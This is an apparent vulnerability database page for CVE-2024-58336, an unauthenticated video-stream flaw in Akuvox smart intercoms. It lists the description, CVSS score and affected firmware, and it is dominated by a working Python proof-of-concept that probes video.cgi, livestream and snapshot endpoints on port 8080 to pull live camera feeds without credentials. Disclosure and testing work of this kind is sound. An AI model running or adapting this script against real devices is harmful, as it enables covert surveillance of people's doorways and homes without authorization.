Security Vulnerability Report
CVE-2024-58336 CVSS 5.3 MEDIUM

CVE-2024-58336

Published: 2025-12-30 23:15:49
Last Modified: 2026-01-16 19:16:16

Description

Akuvox Smart Intercom S539 contains an unauthenticated vulnerability that allows remote attackers to access live video streams by requesting the video.cgi endpoint on port 8080. Attackers can retrieve video stream data without authentication by directly accessing the specified endpoint on affected Akuvox doorphone and intercom devices.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:akuvox:s539_firmware:912.30.1.137:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:akuvox:s539:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:akuvox:s532_firmware:912.30.1.137:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:akuvox:s532:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:akuvox:x916_firmware:912.30.1.137:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:akuvox:x916:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:akuvox:x915_firmware:912.30.1.137:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:akuvox:x915:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:akuvox:x912_firmware:912.30.1.137:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:akuvox:x912:-:*:*:*:*:*:*:* - NOT VULNERABLE
Akuvox Smart Intercom S539 < firmware version unknown
Akuvox Smart Intercom S559 (possibly affected)
Akuvox Smart Intercom S557 (possibly affected)
Other Akuvox smart intercom device models (possibly affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2024-58336 PoC - Akuvox Smart Intercom Unauthenticated Video Stream Access
# This PoC demonstrates the vulnerability in Akuvox Smart Intercom S539

import sys

import requests


def check_vulnerability(target_ip, port=8080):
    """
    Check if target is vulnerable to CVE-2024-58336
    """
    print(f"[*] Checking CVE-2024-58336 on {target_ip}:{port}")

    # Try to access the video endpoint without authentication
    endpoints = [
        "/video.cgi",
        "/cgi-bin/video.cgi",
        "/cgi-bin/video",
        "/livestream.cgi",
        "/cgi-bin/livestream.cgi"
    ]

    for endpoint in endpoints:
        url = f"http://{target_ip}:{port}{endpoint}"
        try:
            print(f"[*] Trying endpoint: {url}")
            response = requests.get(url, timeout=10, stream=True)

            # Check if we get a video stream response
            if response.status_code == 200:
                content_type = response.headers.get('Content-Type', '')
                content_length = response.headers.get('Content-Length', 'Unknown')
                print(f"[+] SUCCESS! Endpoint {endpoint} is accessible")
                print(f"[+] Content-Type: {content_type}")
                print(f"[+] Content-Length: {content_length}")
                print(f"[+] Status Code: {response.status_code}")

                # Try to read first chunk to confirm video data
                try:
                    chunk = next(response.iter_content(chunk_size=1024))
                    if len(chunk) > 0:
                        print(f"[+] Received {len(chunk)} bytes of video data")
                        return True
                except Exception:
                    # An empty or interrupted body is not a confirmation; try the next endpoint
                    pass
        except requests.exceptions.Timeout:
            print(f"[-] Request timeout for {endpoint}")
        except requests.exceptions.ConnectionError:
            print(f"[-] Connection error for {endpoint}")
        except Exception as e:
            print(f"[-] Error accessing {endpoint}: {e}")

    print("[-] No vulnerable endpoints found")
    return False


def exploit_video_stream(target_ip, port=8080):
    """
    Exploit the vulnerability to access video stream
    """
    print(f"\n[*] Attempting to exploit video stream on {target_ip}:{port}")

    # Common video stream endpoints
    endpoints = [
        "/video.cgi",
        "/cgi-bin/video.cgi",
        "/cgi-bin/snapshot.cgi?output=jpg"
    ]

    for endpoint in endpoints:
        url = f"http://{target_ip}:{port}{endpoint}"
        try:
            print(f"[*] Requesting: {url}")
            response = requests.get(url, timeout=10, stream=True, headers={
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
            })
            if response.status_code == 200:
                print(f"[+] Video stream accessible at {url}")
                print(f"[+] Headers: {dict(response.headers)}")
                return True
        except Exception:
            continue

    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2024-58336.py <target_ip> [port]")
        print("Example: python3 cve-2024-58336.py 192.168.1.100 8080")
        sys.exit(1)

    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 8080

    print("=" * 60)
    print("CVE-2024-58336 - Akuvox Smart Intercom Unauthenticated Access")
    print("=" * 60)

    is_vulnerable = check_vulnerability(target, port)
    if is_vulnerable:
        print("\n[!] Target is VULNERABLE to CVE-2024-58336")
        print("[!] Attackers can access video streams without authentication")
        exploit_video_stream(target, port)
    else:
        print("\n[*] Target appears to be NOT vulnerable")

References

Raw JSON Data
